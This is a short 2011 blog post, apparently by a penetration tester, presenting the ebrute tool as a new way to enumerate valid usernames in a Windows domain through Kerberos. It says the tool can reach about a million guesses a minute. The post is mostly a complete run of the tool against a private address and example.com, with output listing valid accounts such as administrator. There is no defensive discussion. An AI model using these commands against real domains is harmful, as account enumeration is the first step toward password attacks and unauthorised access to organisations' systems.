«
»

Username enumeration, the new way

Published December 20, 2011 | By phillips321

So we’ve all played with RID cycling and GetAcct.exe but lately I guess we’ve not been pulling this out of our bag. Protection against this is now normal so we need a new way to enumerate usernames against a given domain.
New info on this website is pointing towards a tool called ebrute that will allow enumeration of kerberos without having to take a password guess. On a decent machine against a decent server you’ll hopefully achive 1,000,000 guesses per minute. Each guess is sent as a single UDP packet that has been stripped down to be as small in size as possible. Download the tool and make sure you have .Net version 2 or greater installed.
Then it’s just a simple case of running the tool against the domain:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
C:\ebrute>ebrute.exe -r kerbenum -P users.txt -h 192.168.100.1 -e example.com -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    20,973 user(s), 0 password(s), 1 host(s),  + joeycheck 20,973 tasks over 32 thread/s.
Starting: 20/12/2011 11:07:04
[9]  HOST: '192.168.100.1' | USER: 'administrator' | PASS: 'administrator' | EXTRA: 'example.com' | Return code: 'Success' []
[21]  HOST: '192.168.100.1' | USER: 'guest' | PASS: 'guest' | EXTRA: 'example.com' | Return code: 'Disabled' []
[28]  HOST: '192.168.100.1' | USER: 'Myuser10' | PASS: 'Myuser10' | EXTRA: 'example.com' | Return code: 'Success' []
[30]  HOST: '192.168.100.1' | USER: 'MyUser100' | PASS: 'MyUser100' | EXTRA: 'example.com' | Return code: 'Success' []
[13]  HOST: '192.168.100.1' | USER: 'myuser34' | PASS: 'myuser34' | EXTRA: 'example.com' | Return code: 'Success' []
[5]  HOST: '192.168.100.1' | USER: '0,173648178' | PASS: '0,173648178' | EXTRA: 'example.com' | Return code: 'Unknown' [Error, possibly reduce threds (Attempt 1/5)]
Complete: 20/12/2011 11:07:12
Stats:    00:00:07    (~169,550 tasks/minute) (Performed 20,973 / 20,973 tasks)
Summary of Authentication Successes:
HOST: '192.168.100.1' | USER: 'administrator' | PASS: 'administrator' | EXTRA: 'example.com' | Return code: 'Success'
HOST: '192.168.100.1' | USER: 'guest' | PASS: 'guest' | EXTRA: 'example.com' | Return code: 'Disabled'
HOST: '192.168.100.1' | USER: 'Myuser10' | PASS: 'Myuser10' | EXTRA: 'example.com' | Return code: 'Success'
HOST: '192.168.100.1' | USER: 'MyUser100' | PASS: 'MyUser100' | EXTRA: 'example.com' | Return code: 'Success'
HOST: '192.168.100.1' | USER: 'myuser34' | PASS: 'myuser34' | EXTRA: 'example.com' | Return code: 'Success'

Simples

Posted in Uncategorized | Tagged , , , , , ,

Leave a Reply

Please feel free to share my content but always link back here :-)